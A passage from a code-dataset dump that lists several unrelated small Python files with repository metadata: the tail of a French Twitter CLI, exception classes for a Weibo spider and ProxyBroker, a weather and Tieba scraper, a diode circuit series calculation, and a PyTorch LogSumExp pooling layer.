-d (--database) c|u
c (create)
*Créer ou récréer la base de données des tweets
u (update)
*Mettre à jour la base de données des tweets
"""), BLUE
)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
print("\n")
print(_(u"Merci d'avoir utilisé clitwit !"))
| [] |
lonsty/weibo-pic-spider-hd | weibo_image_spider/exceptions.py | c7dae38b51209296cc8e71aa6fb80f094d549198 | # @AUTHOR : lonsty
# @DATE : 2020/3/28 18:01
class CookiesExpiredException(Exception):
pass
class NoImagesException(Exception):
pass
class ContentParserError(Exception):
pass
class UserNotFound(Exception):
pass
| [] |
lilei644/python-learning-example | WebHtmlExample/WebHtmlExample.py | 71910a32bc8b3b8f23ba13babb583af453405bbe | import requests
from bs4 import BeautifulSoup
import re
# 设置请求头
# 更换一下爬虫的User-Agent,这是最常规的爬虫设置
headers = {
"User-Agent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
# 获取天气信息
def get_weather():
html = requests.get("http://www.weather.com.cn/weather/101280601.shtml", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
soup = BeautifulSoup(html.text, "lxml")
light_list = soup.select('p.tem span')
night_list = soup.select('p.tem i')
for index in range(0, len(light_list)):
print('白天温度:{0}, 夜晚温度:{1}'.format(light_list[index].get_text(), night_list[index].get_text()))
# 获取贴吧回复数
def get_bar():
html = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=python3", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
# <span class="threadlist_rep_num center_text" title="回复">9</span>
tag_list = re.findall(r'(?<="回复">)\d*(?=</span>)', html.text)
print(tag_list)
if __name__ == '__main__':
get_weather()
get_bar()
| [((13, 11, 13, 93), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((25, 11, 25, 88), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((16, 15, 16, 47), 'bs4.BeautifulSoup', 'BeautifulSoup', ({(16, 29, 16, 38): 'html.text', (16, 40, 16, 46): '"""lxml"""'}, {}), "(html.text, 'lxml')", False, 'from bs4 import BeautifulSoup\n'), ((29, 19, 29, 73), 're.findall', 're.findall', ({(29, 30, 29, 61): '"""(?<="回复">)\\\\d*(?=</span>)"""', (29, 63, 29, 72): 'html.text'}, {}), '(\'(?<="回复">)\\\\d*(?=</span>)\', html.text)', False, 'import re\n')] |
JosepFanals/HELM | Codi/diode.py | feb579f37eb0850ba2a7acef18f8d3d78b9e599c | import numpy as np
import math
import matplotlib.pyplot as plt
U = 5 # equival a l'E
R = 2 # equival a R1
R2 = 3
P = 1.2
Vt = 0.026
Is = 0.000005
n = 200 # profunditat
Vd = np.zeros(n) # sèries
Vl = np.zeros(n)
I1 = np.zeros(n)
I1[0] = U / R # inicialització de les sèries
Vd[0] = Vt * math.log(1 + I1[0] / Is)
Vl[0] = P / I1[0]
def convVd(Vd, I, i): # convolució pel càlcul de Vd[i]
suma = 0
for k in range(1, i):
suma += k * Vd[k] * I[i - k]
return suma
def convVlI(Vl, I1, i): # convolució pel càlcul de Vl[i]
suma = 0
for k in range(i):
suma = suma + Vl[k] * I1[i - k]
return suma
for i in range(1, n): # càlcul dels coeficients
I1[i] = (1 / R + 1 / R2) * (-Vd[i - 1] - Vl[i - 1])
Vd[i] = (i * Vt * I1[i] - convVd(Vd, I1, i)) / (i * (Is + I1[0]))
Vl[i] = -convVlI(Vl, I1, i) / I1[0]
If = sum(I1)
Vdf = sum(Vd)
Vlf = sum(Vl)
print('I1: ' + str(If))
print('Vd: ' + str(Vdf))
print('Vl: ' + str(Vlf))
print('P: ' + str(Vlf * If))
Vdfinal = np.zeros(n) # per tal de veure com evoluciona la tensió del díode
for j in range(n):
Vdfinal[j] = np.sum([Vd[:(j+1)]])
print(Vdfinal)
| [((14, 5, 14, 16), 'numpy.zeros', 'np.zeros', ({(14, 14, 14, 15): 'n'}, {}), '(n)', True, 'import numpy as np\n'), ((15, 5, 15, 16), 'numpy.zeros', 'np.zeros', ({(15, 14, 15, 15): 'n'}, {}), '(n)', True, 'import numpy as np\n'), ((16, 5, 16, 16), 'numpy.zeros', 'np.zeros', ({(16, 14, 16, 15): 'n'}, {}), '(n)', True, 'import numpy as np\n'), ((52, 10, 52, 21), 'numpy.zeros', 'np.zeros', ({(52, 19, 52, 20): 'n'}, {}), '(n)', True, 'import numpy as np\n'), ((20, 13, 20, 37), 'math.log', 'math.log', ({(20, 22, 20, 36): '(1 + I1[0] / Is)'}, {}), '(1 + I1[0] / Is)', False, 'import math\n'), ((54, 17, 54, 37), 'numpy.sum', 'np.sum', ({(54, 24, 54, 36): '[Vd[:j + 1]]'}, {}), '([Vd[:j + 1]])', True, 'import numpy as np\n')] |
aljeshishe/ProxyBroker | proxybroker/errors.py | 195c050162275f63ebe033be765abec90601e3e1 | """Errors."""
class ProxyError(Exception):
pass
class NoProxyError(Exception):
pass
class ResolveError(Exception):
pass
class ProxyConnError(ProxyError):
pass
class ProxyRecvError(ProxyError): # connection_is_reset
pass
class ProxySendError(ProxyError): # connection_is_reset
pass
class ProxyTimeoutError(ProxyError):
pass
class ProxyEmptyResponseError(ProxyError):
pass
class BadStatusError(Exception): # BadStatusLine
pass
class BadResponseError(Exception):
pass
class BadStatusLine(Exception):
pass
class ErrorOnStream(Exception):
pass
| [] |
lvying1991/KBQA-System | questionanswering/models/pooling.py | 55e69c8320df3f7b199860afc76e8a0ab66f540e | import torch
from torch import nn as nn
from torch import autograd
class LogSumExpPooling1d(nn.Module):
"""Applies a 1D LogSumExp pooling over an input signal composed of several input planes.
LogSumExp is a smooth approximation of the max function.
在由多个输入平面组成的输入信号上应用1D LogSumExp池。
LogSumExp是max函数的平滑近似值。
Examples:
>>> m = LogSumExpPooling1d()
>>> input = autograd.Variable(torch.randn(4, 5, 10))
>>> m(input).squeeze()
"""
def __init__(self):
super(LogSumExpPooling1d, self).__init__()
def forward(self, x):
x.exp_()
x = x.sum(dim=-1, keepdim=True)
x.log_()
return x
def __repr__(self):
return self.__class__.__name__ + '()'
| [] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.